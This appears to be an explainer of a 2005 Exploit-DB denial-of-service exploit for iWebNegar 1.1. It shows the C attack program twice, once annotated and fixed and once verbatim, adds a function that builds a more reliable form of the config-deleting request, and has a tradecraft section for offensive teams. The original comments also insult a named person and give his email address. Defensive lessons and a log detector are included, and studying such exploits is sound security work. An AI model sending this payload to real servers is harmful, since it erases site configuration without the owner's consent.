iWebNegar 1.1 Configuration Nullification DoS Explained

What this paper is
This paper details a Denial of Service (DoS) vulnerability in iWebNegar version 1.1, a PHP-based web application. The exploit, written in C for Windows, sends a single over-long query string to the admin/conf_edit.php script. According to the exploit author's note, the script enforces a fixed input length and, when that limit is exceeded, takes a Die() path that erases config.php, leaving the application without its configuration and therefore unusable. The paper calls this a "buffer overflow"; it is an application-level length limit with a destructive failure path, not a native memory-corruption overflow, as the technical breakdown below explains.
Simple technical breakdown
The core of the vulnerability lies in how iWebNegar's admin/conf_edit.php handles the input it receives for configuration editing. The exploit author's comment is the only description of the PHP side on this page: the script has "a limited buffer" and when input exceeds it the script "will go to Die() functions which cause the erase of config.php". The exploit therefore sends a request whose query string is 275 bytes of filler. Because PHP strings carry their own length, an over-long string does not overwrite memory or divert execution the way a C stack overflow would; what happens is that the script's own length check fails into an error handler that removes the configuration file instead of simply rejecting the request. The PHP proof of concept is described as private and the iWebNegar source is not included, so the exact limit and the exact file operation behind Die() are not documented here beyond that note.
Complete code and payload walkthrough
The provided C source builds a Windows console program (Microsoft Visual C++, Winsock 2) that resolves the target, connects to TCP port 80 and sends one 300-byte request.
/*
iwebnegar 1.1 remote exploit
c0ded by root / c0d3r " kaveh razavi ": c0d3rz_team@yahoo.com
bug found by " hossein asgary " in simorgh-ev security team ( u rux hossein )
compile with Ms visual C++ (the php version written by the bug finder but still priv8)
greetz : LorD & NT from IHS , vbehzadan & sIiiS from hyper-security.com ,
Jamie & Ben from exploitdev .
Lamer : shervin_kesafat@yahoo.com ( who can fuck him ? )
*/
/* there is a limited buffer in the php code of iwebnegar when u overflow it , it will
go to Die() functions which cause the erase of config.php
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>               /* Winsock 2; also pulls in windows.h, which supplies Sleep() */
#pragma comment(lib, "ws2_32.lib")  /* MSVC: link the Winsock 2 import library without a linker flag */
#define size 300                    /* bytes on the wire: 25-byte request prefix + 275 bytes of filler */
int main (int argc, char *argv[]){
    /* Request prefix only: no parameter name after '?', no HTTP version,
       no Host header, no CRLF. Everything after the '?' is the filler. */
    char req[] =
    "GET /admin/conf_edit.php?";
    int rc;
    unsigned long addr = INADDR_NONE;   /* numeric address when argv[1] is a dotted quad */
    SOCKET sock;                        /* socket() returns INVALID_SOCKET on failure, never 0 */
    struct sockaddr_in tcp;
    struct hostent * hp;
    WSADATA wsaData;
    char buffer[size];
    memset(buffer,'A',300);             /* fill all 300 bytes with 'A' */
    memcpy(buffer,req,25);              /* 25 = strlen(req); the NUL is not copied, so 275 'A's remain */
    if(argc < 2) {
        printf("\nusage : iwebnegar host\n");
        printf("example : iwebnegar.exe 127.0.0.1\n");
        exit(-1) ;
    }
    if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
        printf("WSAStartup failed !\n");
        exit(-1);
    }
    hp = gethostbyname(argv[1]);        /* try argv[1] as a hostname first ... */
    if (!hp){
        addr = inet_addr(argv[1]);      /* ... then as a dotted-quad IPv4 address */
    }
    if ((!hp) && (addr == INADDR_NONE) ){
        printf("Unable to resolve %s\n",argv[1]);
        WSACleanup();
        exit(-1);
    }
    sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    if (sock == INVALID_SOCKET){        /* the original tested !sock, which never fires on Windows */
        printf("socket() error...\n");
        WSACleanup();
        exit(-1);
    }
    memset(&tcp, 0, sizeof(tcp));
    if (hp != NULL)
        memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
    else
        tcp.sin_addr.s_addr = addr;
    if (hp)
        tcp.sin_family = hp->h_addrtype;
    else
        tcp.sin_family = AF_INET;
    tcp.sin_port=htons(80);             /* port is hardcoded; edit and recompile for other ports */
    printf("\n[+] attacking host %s\n" , argv[1]) ;
    printf("[+] Building overflow string\n");
    Sleep(1000);                        /* cosmetic pause, no protocol purpose */
    printf("[+] packet size = %d byte\n" , (int)sizeof(buffer));
    rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
    if(rc==0)
    {
        Sleep(1000) ;
        printf("[+] connected\n") ;
        /* One send of the whole 300-byte buffer. The request line has no
           terminator, so the server only sees its end when the connection
           closes; the original left that to process exit. */
        send(sock , buffer , sizeof(buffer) , 0);
        printf("[+] see if the config.php erased ! \n\n") ;
    }
    else {
        /* any connect() failure lands here, not only a closed port 80 */
        printf("the 80 port is not open try another webserver port\n");
    }
    closesocket(sock);                  /* explicit close ends the request for the server */
    WSACleanup();
    return 0;
}
// milw0rm.com [2005-01-04]

Code Fragment/Block -> Practical Purpose
- /* ... */ (comment blocks): The author's notes on the exploit's origin, credits and the bug ("a limited buffer in the php code ... go to Die() functions which cause the erase of config.php"). They do not affect execution, and they are the only description of the PHP side on the page; the PHP proof of concept is described as private.
- #include <stdio.h>, <stdlib.h>, <string.h>, <winsock2.h>: Standard C I/O, exit(), memset()/memcpy(), and the Windows Sockets 2 API. winsock2.h also brings in windows.h, which supplies Sleep().
- #pragma comment(lib, "ws2_32.lib"): MSVC-specific directive that links the Winsock 2 import library without a linker flag. The header is winsock2.h; the library is ws2_32.lib.
- #define size 300: Size of buffer and therefore of the whole request on the wire.
- int main(int argc, char *argv[]): Entry point; argv[1] is the target host.
- char req[] = "GET /admin/conf_edit.php?";: The request line prefix. Note what it lacks: a parameter name after '?', an HTTP version, a CRLF terminator and a Host header. The filler that follows is the query string.
- unsigned int rc,addr,sock;: The return code of connect(), the numeric address parsed by inet_addr(), and the socket handle. On Windows a failed socket() returns INVALID_SOCKET (all bits set), not 0, so the original if (!sock) test never fires.
- struct sockaddr_in tcp; struct hostent *hp; WSADATA wsaData;: Destination address, resolver result, and Winsock initialisation data.
- char buffer[size]; memset(buffer,'A',300);: The 300-byte send buffer, filled with 'A'. The value is arbitrary; nothing on the server interprets it as code, it only has to be long.
- memcpy(buffer,req,25);: Overwrites the first 25 bytes with the request prefix. 25 is strlen(req), not sizeof(req), so the NUL is not copied and the remaining 275 bytes stay 'A'. The payload is therefore GET /admin/conf_edit.php? followed by 275 'A's with no line terminator.
- if(argc < 2) { ... }: Usage check; prints the expected invocation and exits.
- WSAStartup(MAKEWORD(2,1),&wsaData): Initialises Winsock 2.1; exits on failure.
- hp = gethostbyname(argv[1]); if (!hp) addr = inet_addr(argv[1]);: Resolves a hostname, otherwise parses a dotted quad; INADDR_NONE means neither worked and the program exits.
- sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);: Creates an IPv4 TCP socket.
- tcp.sin_addr / tcp.sin_family / tcp.sin_port=htons(80);: Fills in the destination from whichever lookup succeeded; port 80 is hardcoded.
- printf(...) and Sleep(1000): Progress messages and one-second pauses; cosmetic only.
- rc=connect(sock, ...): TCP connect; 0 on success.
- send(sock, buffer, sizeof(buffer), 0): Writes the 300 bytes in one call. Because the request line has no terminator, the server only sees the end of the request when the connection closes, which the original leaves to process exit. Whether the server then treats the unterminated line as a complete HTTP/0.9-style request or discards it depends on the web server; a server that discards it makes the exploit a no-op.
- printf("[+] see if the config.php erased ! \n\n"): The program does no verification; the operator checks the application by hand.
- else { printf("the 80 port is not open ...") }: Any connect() failure lands here (filtered port, unreachable host), not only a closed port 80.
Shellcode/Payload Explanation:
This exploit carries no shellcode: there is no machine code in the payload and nothing on the server executes the 'A's. The payload is the raw request itself, GET /admin/conf_edit.php? followed by 275 'A' characters, 300 bytes in all, with no HTTP version, no headers and no line terminator. The "overflow" is an application-level one. According to the author's note, conf_edit.php enforces a fixed input limit and, when the query string exceeds it, takes a Die() path whose side effect is the removal of config.php. PHP strings are length-managed, so no memory is corrupted and no return address is overwritten; the defect is the destructive error path, not memory unsafety. The PHP source is not included in the paper, so the exact limit and the exact code path are known only from that note.
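What actually leaves the attacker's host, as an added example (this is not the author's code and not part of the paper): the first function reproduces the exploit's 300-byte buffer byte for byte from the same path and filler; the second builds the well-formed HTTP/1.0 request a practitioner would send instead so as not to depend on the server accepting an unterminated request line. The host name www.example.com, the FILL_LEN constant and the function names are this example's own.

```c
/* Added example: what the exploit puts on the wire, and a well-formed
 * alternative. Not part of the original paper. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define TARGET_PATH "/admin/conf_edit.php"   /* path hardcoded by the exploit */
#define FILL_LEN    275                      /* 300 - strlen("GET /admin/conf_edit.php?") */

/* Reproduce the exploit's buffer: "GET <path>?" then filler up to 'total'
 * bytes. No version, no headers, no CRLF, no NUL. Returns bytes produced,
 * or 0 if the prefix alone does not fit. */
size_t build_raw_payload(char *out, size_t total, const char *path, char fill)
{
    int n = snprintf(out, total, "GET %s?", path);
    if (n < 0 || (size_t)n >= total) return 0;
    memset(out + n, fill, total - (size_t)n);
    return total;
}

/* Same over-long query string inside a complete HTTP/1.0 request: request
 * line with version, a Host header (needed by name-based virtual hosts) and
 * the blank line that ends the request, so the server parses it without
 * waiting for the client to close. Returns the length or 0 if 'cap' is
 * too small. */
size_t build_http10_request(char *out, size_t cap, const char *host,
                            const char *path, size_t fill_len, char fill)
{
    size_t need = strlen("GET ") + strlen(path) + 1 + fill_len +
                  strlen(" HTTP/1.0\r\nHost: ") + strlen(host) + strlen("\r\n\r\n");
    if (need + 1 > cap) return 0;            /* +1 for sprintf's NUL */
    char *p = out;
    p += sprintf(p, "GET %s?", path);
    memset(p, fill, fill_len);
    p += fill_len;
    p += sprintf(p, " HTTP/1.0\r\nHost: %s\r\n\r\n", host);
    return (size_t)(p - out);
}

/* Length of the query string in a request line: everything after the first
 * '?' up to a space, CR, LF or the end of the buffer. */
size_t query_length(const char *req, size_t len)
{
    const char *q = memchr(req, '?', len);
    if (!q) return 0;
    size_t n = 0;
    for (const char *p = q + 1; p < req + len && *p != ' ' && *p != '\r' && *p != '\n'; p++)
        n++;
    return n;
}

int main(void)
{
    char raw[300];
    char http[512];
    size_t rl = build_raw_payload(raw, sizeof raw, TARGET_PATH, 'A');
    size_t hl = build_http10_request(http, sizeof http, "www.example.com",
                                     TARGET_PATH, FILL_LEN, 'A');
    printf("raw payload : %lu bytes, query %lu bytes, line terminated: %s\n",
           (unsigned long)rl, (unsigned long)query_length(raw, rl),
           memchr(raw, '\n', rl) ? "yes" : "no");
    printf("http/1.0    : %lu bytes, query %lu bytes, line terminated: yes\n",
           (unsigned long)hl, (unsigned long)query_length(http, hl));
    return 0;
}
```

Comparing the two outputs shows the exploit's dependence on server behaviour: the raw blob contains no LF at all, so a server that requires a complete request line before parsing never sees a request, while the HTTP/1.0 form delivers the identical 275-byte query string with the usual terminator and a Host header.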
Practical details for offensive operations teams
- Required Access Level: Network access to the target web server is all that is needed. The exploit sends a single unauthenticated HTTP request; the script sits under /admin/, but the request carries no session cookie or credentials, so no account on the iWebNegar application is required.
- Lab Preconditions:
- A vulnerable iWebNegar 1.1 installation accessible via HTTP (port 80 by default).
- A Windows machine with a C compiler (like Microsoft Visual C++) to compile the exploit.
- The ws2_32.lib import library (pulled in by the #pragma comment) must be available; it ships with Visual C++ and the Windows SDK.
- Tooling Assumptions:
- The exploit is a standalone C executable compiled for Windows.
- Standard network utilities are assumed for verification (e.g. ping or telnet to check port status, or a web browser to check the application's state after the attack).
- Execution Pitfalls:
- Port 80 Hardcoded: The destination is fixed by htons(80); nothing is probed. If the web server listens elsewhere, connect() fails and the program prints the port-80 message; change the constant and recompile. The same message appears for any other connect() failure (filtered port, unreachable host).
- Network Connectivity: Standard network issues (firewalls, routing problems) can prevent the exploit from reaching the target.
- iWebNegar Version: The exploit is written for iWebNegar 1.1 and hardcodes the path /admin/conf_edit.php. The paper says nothing about other versions; a different install path or a changed script turns the request into a harmless 404 or an ordinary page load.
- Server-Side Patches: If the server-side PHP script has been patched to correctly handle input lengths, the overflow will not occur.
- Request Size: The 300 bytes (25-byte prefix plus 275 'A's) are the author's choice; the page does not give the script's actual limit. If the limit is larger than 275 the Die() path is never reached. There is no memory layout to hit, so "longer than the limit" is the only property that matters and extra filler is harmless.
- Malformed Request: The request has no HTTP version, no Host header and no terminating CRLF, so it is only complete when the client closes the connection. Whether the server then treats it as an HTTP/0.9-style request or discards it depends on the web server and its configuration, and on name-based virtual hosting the missing Host header may route it to the wrong site. The query string also carries no parameter name, so the result depends on how conf_edit.php reads its input.
- PHP Error Handling: The outcome depends on the PHP configuration and the script's own error path. The author's note says Die() removes config.php; if that path is guarded, or the web server user cannot write to the directory, the file survives.
- Tradecraft Considerations:
- Reconnaissance: Confirm the target is running iWebNegar and identify its version. Check if port 80 is open.
- Payload Delivery: The exploit is a standalone executable. It would be delivered to the operator's machine and executed locally, targeting the remote server.
- Stealth: This is a DoS with a permanent side effect. A 300-byte request line to /admin/conf_edit.php with an all-'A' query string is trivially matched by any IDS/IPS or WAF rule that looks at request-line length, repeated characters or hits on the admin path, and it lands in the web server's access log. The connect() and send() calls themselves are ordinary TCP.
- Post-Exploitation: None beyond verification. Confirm config.php is gone by requesting the application and observing a configuration error, or by inspecting the filesystem where that access is authorised.
Where this was used and when
- Context: This exploit targets a specific web application (iWebNegar 1.1). Its usage would be limited to environments where this vulnerable version was deployed.
- Timeframe: The exploit was published on January 4, 2005. Therefore, its relevant timeframe for active exploitation would be around 2005 and shortly thereafter, before iWebNegar was updated or replaced. It's unlikely to be effective against modern, patched systems.
Defensive lessons for modern teams
- Input Validation is Crucial: Validate the size and format of all user-supplied input, and make the failure path of that check a rejection (an HTTP 4xx and a log line), never a destructive action. The lesson here is less "check lengths" than "an error handler must not delete state".
- Secure Coding Practices: Developers must be trained to keep error and exit paths free of side effects; a failed check should stop the request without touching files.
- Regular Patching and Updates: Keep all web applications and their underlying frameworks (like PHP) updated to the latest secure versions.
- Web Application Firewalls (WAFs): Deploy WAFs that can detect and block malformed HTTP requests, including those attempting buffer overflows or targeting known vulnerable paths.
- File Integrity Monitoring: Monitor critical application files (such as config.php) so that an unexpected deletion or modification raises an alert immediately.
- Least Privilege: Run the web server process with the minimum privileges it needs. A script that only reads its configuration should not run as a user that can delete it; where configuration edits are a feature, confine write access to that one file.
- Error Handling: Implement error handling that neither reveals sensitive information nor performs unintended actions. An error path that removes config.php, reachable from an unauthenticated request, is a design flaw independent of the length check that triggers it.
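For the WAF and file-integrity points above, and for the Stealth note in the tradecraft section, here is an added detection check that is not from the paper or from iWebNegar: it scans Apache-style access log lines and flags requests to /admin/conf_edit.php whose query string exceeds a length threshold. The log lines are constructed samples, the 255-byte MAX_QUERY is an assumed threshold (the script's real limit is not on the page), and the parser accepts both a normal HTTP/1.x request line and the version-less line that a server which accepts the exploit's unterminated request records.

```c
/* Added example: flag over-long query strings to the vulnerable script in
 * access-log lines. Sample lines and the threshold are constructed. */
#include <stdio.h>
#include <string.h>

#define WATCHED_PATH "/admin/conf_edit.php"
#define MAX_QUERY    255          /* assumed threshold, not iWebNegar's real limit */

/* Build a 275-'A' query at compile time (the exploit's filler length). */
#define A16  "AAAAAAAAAAAAAAAA"
#define A64  A16 A16 A16 A16
#define A256 A64 A64 A64 A64
#define A275 A256 A16 "AAA"

/* Constructed samples in combined log format; not real logs. */
static const char *const sample_lines[] = {
    "10.0.0.5 - - [04/Jan/2005:10:00:01 +0000] \"GET /index.php HTTP/1.1\" 200 1834",
    "10.0.0.5 - - [04/Jan/2005:10:00:02 +0000] \"GET /admin/conf_edit.php?site=demo HTTP/1.1\" 200 512",
    /* version-less request line: how a server that accepts the exploit's unterminated request logs it */
    "10.0.0.99 - - [04/Jan/2005:10:00:03 +0000] \"GET /admin/conf_edit.php?" A275 "\" 200 0",
    /* same attack sent as a proper HTTP/1.0 request */
    "10.0.0.99 - - [04/Jan/2005:10:00:04 +0000] \"GET /admin/conf_edit.php?" A275 " HTTP/1.0\" 200 0",
    /* long query to a different script: not this rule's business */
    "10.0.0.7 - - [04/Jan/2005:10:00:05 +0000] \"GET /search.php?q=" A256 " HTTP/1.1\" 200 77",
};
#define N_SAMPLE (sizeof sample_lines / sizeof sample_lines[0])

/* Extract the request target: the token after the method inside the first
 * quoted field. Works for "GET /x HTTP/1.1" and for "GET /x" with no
 * version. Returns 0 if the line has no quoted request field. */
static int extract_target(const char *line, const char **tgt, size_t *tlen)
{
    const char *q1 = strchr(line, '"');
    if (!q1) return 0;
    const char *q2 = strchr(q1 + 1, '"');
    if (!q2) return 0;
    const char *sp = memchr(q1 + 1, ' ', (size_t)(q2 - q1 - 1));   /* end of method */
    if (!sp) return 0;
    const char *start = sp + 1;
    const char *end = memchr(start, ' ', (size_t)(q2 - start));   /* before version, if any */
    if (!end) end = q2;
    *tgt = start;
    *tlen = (size_t)(end - start);
    return 1;
}

/* 1 if the line is a request to WATCHED_PATH whose query string is longer
 * than max_query bytes, else 0. */
int flag_oversized_conf_edit(const char *line, size_t max_query)
{
    const char *t;
    size_t n;
    if (!extract_target(line, &t, &n)) return 0;
    size_t plen = strlen(WATCHED_PATH);
    if (n < plen || memcmp(t, WATCHED_PATH, plen) != 0) return 0;   /* other path */
    if (n == plen || t[plen] != '?') return 0;                       /* no query string */
    return (n - plen - 1) > max_query;
}

/* Run the check over a batch of lines; returns how many were flagged. */
int count_flagged(const char *const *lines, int nlines, size_t max_query)
{
    int hits = 0;
    for (int i = 0; i < nlines; i++)
        hits += flag_oversized_conf_edit(lines[i], max_query);
    return hits;
}

int main(void)
{
    for (size_t i = 0; i < N_SAMPLE; i++)
        if (flag_oversized_conf_edit(sample_lines[i], MAX_QUERY))
            printf("ALERT: oversized query to %s in sample line %lu\n",
                   WATCHED_PATH, (unsigned long)(i + 1));
    return 0;
}
```

The same condition, request-line length on that one path, maps directly onto a WAF or mod_security rule; a file-integrity alert on config.php catches the outcome when the request itself was missed.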
ASCII visual (if applicable)
This exploit is a network attack: the attacker's client sends one malformed HTTP request to a vulnerable server-side script.
+-----------------+        +-----------------------+        +-----------------------+
| Attacker's Host | -----> | Network (Internet/LAN)| -----> | Target Web Server     |
| (Windows C App) |        |                       |        | (iWebNegar 1.1)       |
+-----------------+        +-----------------------+        +-----------------------+
        |                                                              |
        | 1. Sends one 300-byte request: "GET /admin/conf_edit.php?"   |
        |    followed by 275 'A's (no version, no headers, no CRLF)    |
        +------------------------------------------------------------->|
                                                                       |
                                                    2. conf_edit.php receives the
                                                       over-long query string;
                                                       its input limit is exceeded.
                                                                       |
                                                    3. Die() path runs and
                                                       erases config.php.
                                                                       v
                                                            (config.php deleted)

Source references
- Paper ID: 738
- Paper Title: iWebNegar 1.1 - Configuration Nullification Denial of Service
- Author: c0d3r
- Published: 2005-01-04
- Keywords: PHP, dos
- Paper URL: https://www.exploit-db.com/papers/738
- Raw Exploit URL: https://www.exploit-db.com/raw/738
Original Exploit-DB Content (Verbatim)
/*
iwebnegar 1.1 remote exploit
c0ded by root / c0d3r " kaveh razavi ": c0d3rz_team@yahoo.com
bug found by " hossein asgary " in simorgh-ev security team ( u rux hossein )
compile with Ms visual C++ (the php version written by the bug finder but still priv8)
greetz : LorD & NT from IHS , vbehzadan & sIiiS from hyper-security.com ,
Jamie & Ben from exploitdev .
Lamer : shervin_kesafat@yahoo.com ( who can fuck him ? )
*/
/* there is a limited buffer in the php code of iwebnegar when u overflow it , it will
go to Die() functions which cause the erase of config.php
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define size 300
int main (int argc, char *argv[]){
char req[] =
"GET /admin/conf_edit.php?";
unsigned int rc,addr,sock ;
struct sockaddr_in tcp;
struct hostent * hp;
WSADATA wsaData;
char buffer[size];
memset(buffer,'A',300);
memcpy(buffer,req,25);
if(argc < 2) {
printf("\nusage : iwebnegar host\n");
printf("example : iwebnegar.exe 127.0.0.1\n");
exit(-1) ;
}
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
printf("WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) ){
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock){
printf("socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
else
tcp.sin_addr.s_addr = addr;
if (hp)
tcp.sin_family = hp->h_addrtype;
else
tcp.sin_family = AF_INET;
tcp.sin_port=htons(80);
printf("\n[+] attacking host %s\n" , argv[1]) ;
printf("[+] Building overflow string\n");
Sleep(1000);
printf("[+] packet size = %d byte\n" , sizeof(buffer));
rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
if(rc==0)
{
Sleep(1000) ;
printf("[+] connected\n") ;
send(sock , buffer , sizeof(buffer) , 0);
printf("[+] see if the config.php erased ! \n\n") ;
}
else {
printf("the 80 port is not open try another webserver port\n");
}
}
// milw0rm.com [2005-01-04]